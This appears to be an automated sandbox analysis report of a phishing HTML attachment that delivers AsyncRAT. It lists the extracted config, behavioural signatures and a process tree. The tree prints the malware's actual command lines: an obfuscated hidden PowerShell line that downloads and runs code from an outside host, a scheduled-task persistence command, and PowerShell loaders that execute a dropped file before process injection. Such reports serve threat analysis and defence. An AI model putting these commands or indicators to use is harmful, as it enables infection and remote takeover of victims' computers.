Analysis
  max time kernel: 145s
  max time network: 146s
  platform: windows10-2004_x64
  resource: win10v2004-20240704-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240704-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 12/07/2024, 14:00
Static task
  static1
General
  Target: Statment#5173642159.html
  Size: 1KB
  MD5: 1231d299fcd9917fde1326f9ef677361
  SHA1: f92479f63b0279c16e8499fe294e7b3d81da5942
  SHA256: e296925add362ceb26927e02439ad56accc8ce03b14712fbd4dd41377be036aa
  SHA512: 0b76638bad3c2036c048b4b381a6192a14ed8770545d73ad8d49990ce30bd725b75fa721578e47cad8b946f63cc2e3681014acf72ba4af3598adba9e49345205
Malware Config
Extracted
  Family: asyncrat
  AWS | 3Losh
  Elsa3eed
  AsyncMutex_alosh
  delay: 3
  install: false
  install_folder: %AppData%
  pastebin_config: https://pastebin.com/raw/C7vDhgZQ
Signatures
Blocklisted process makes network request 4 IoCs
  - flow 76, pid 3600, WScript.exe
  - flow 80, pid 1832, powershell.exe
  - flow 86, pid 1832, powershell.exe
  - flow 90, pid 1832, powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
  - pid 1832, powershell.exe
  - pid 4240, powershell.exe
  - pid 4040, powershell.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
  - Key value queried: \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation (WScript.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation (WScript.exe)
  - Key value queried: \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation (WScript.exe)
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
  - File opened (read-only): \??\E: (msedge.exe)
  - File opened (read-only): \??\E: (WScript.exe)
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  - flow 81, pastebin.com
  - flow 82, pastebin.com
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
  - flow 85, api.ipify.org
  - flow 86, api.ipify.org
Suspicious use of SetThreadContext 2 IoCs
  - PID 4240 set thread context of 2876 (pid 4240, powershell.exe, procid_target 128)
  - PID 4040 set thread context of 5056 (pid 4040, powershell.exe, procid_target 133)
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003 (msedge.exe)
  - Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\HardwareID (msedge.exe)
  - Key value queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service (msedge.exe)
Enumerates system info in registry 2 TTPs 3 IoCs
  - Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
  - Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
Modifies registry class 1 IoCs
  - Key created: \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000_Classes\Local Settings (msedge.exe)
NTFS ADS 1 IoCs
  - File opened for modification: C:\Users\Admin\Downloads\Unconfirmed 519947.crdownload:SmartScreen (msedge.exe)
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
  - pid 2872, schtasks.exe
Suspicious behavior: EnumeratesProcesses 25 IoCs
  - pid 2520, msedge.exe
  - pid 2520, msedge.exe
  - pid 3500, msedge.exe
  - pid 3500, msedge.exe
  - pid 4824, identity_helper.exe
  - pid 4824, identity_helper.exe
  - pid 5092, msedge.exe
  - pid 5092, msedge.exe
  - pid 1832, powershell.exe
  - pid 1832, powershell.exe
  - pid 1832, powershell.exe
  - pid 4240, powershell.exe
  - pid 4240, powershell.exe
  - pid 4240, powershell.exe
  - pid 2876, aspnet_compiler.exe
  - pid 2876, aspnet_compiler.exe
  - pid 4040, powershell.exe
  - pid 4040, powershell.exe
  - pid 4040, powershell.exe
  - pid 4040, powershell.exe
  - pid 4040, powershell.exe
  - pid 2820, msedge.exe
  - pid 2820, msedge.exe
  - pid 2820, msedge.exe
  - pid 2820, msedge.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  - pid 3500, msedge.exe
  - pid 3500, msedge.exe
  - pid 3500, msedge.exe
  - pid 3500, msedge.exe
  - pid 3500, msedge.exe
  - pid 3500, msedge.exe
  - pid 3500, msedge.exe
Suspicious use of AdjustPrivilegeToken 6 IoCs
  - Token: SeManageVolumePrivilege (pid 3500, msedge.exe)
  - Token: SeManageVolumePrivilege (pid 3500, msedge.exe)
  - Token: SeDebugPrivilege (pid 1832, powershell.exe)
  - Token: SeDebugPrivilege (pid 4240, powershell.exe)
  - Token: SeDebugPrivilege (pid 2876, aspnet_compiler.exe)
  - Token: SeDebugPrivilege (pid 4040, powershell.exe)
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe 3500 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
  - pid 2876, aspnet_compiler.exe
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3500 wrote to memory of 4660 3500 msedge.exe 83 PID 3500 wrote to memory of 4660 3500 msedge.exe 83 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 
msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 3624 3500 msedge.exe 84 PID 3500 wrote to memory of 2520 3500 msedge.exe 85 PID 3500 wrote to memory of 2520 3500 msedge.exe 85 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 PID 3500 wrote to memory of 4916 3500 msedge.exe 86 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3500)
  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\Statment#5173642159.html
  - Enumerates connected drives
  - Checks SCSI registry key(s)
  - Enumerates system info in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4660)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffab55746f8,0x7ffab5574708,0x7ffab5574718

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3624)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2520)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4916)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 212)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 672)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4584)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4932 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2444)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 4436)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8

    C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe (PID 4824)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4704)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2788)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5092)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5140 /prefetch:8
      - Suspicious behavior: EnumeratesProcesses

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4864)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6328 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 1948)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1

    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2820)
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,3677432979724521349,352571397294069071,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4860 /prefetch:2
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\System32\CompPkgSrv.exe (PID 2212)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe (PID 4376)
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\WScript.exe (PID 3600)
  Command line: "C:\Windows\System32\WScript.exe" "E:\Statment#386350474.wsf"
  - Blocklisted process makes network request
  - Checks computer location settings
  - Enumerates connected drives

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1832)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://newwork.webredirect.org:777/dddd.mp4'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
      - Blocklisted process makes network request
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

        C:\Windows\system32\schtasks.exe (PID 2872)
          Command line: "C:\Windows\system32\schtasks.exe" /Create /XML C:\Users\Public\Music\SFYZCOEBMGAPWXV.xml /TN TvMusic2
          - Scheduled Task/Job: Scheduled Task

        C:\Windows\system32\schtasks.exe (PID 2360)
          Command line: "C:\Windows\system32\schtasks.exe" /Run /TN TvMusic2

C:\Windows\System32\WScript.exe (PID 4856)
  Command line: C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
  - Checks computer location settings

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4240)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (PID 2876)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of SetWindowsHookEx

C:\Windows\System32\WScript.exe (PID 1496)
  Command line: C:\Windows\System32\WScript.exe "C:\Users\Public\Music\TvMusic.vbs"
  - Checks computer location settings

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4040)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $usefont='ReadAllText';$resberrys='C:\Users\Public\Music\TvMusic.music';IEx([IO.File]::$usefont($resberrys))
      - Command and Scripting Interpreter: PowerShell
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (PID 2256)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

        C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe (PID 5056)
          Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
MITRE ATT&CK Enterprise v15
Downloads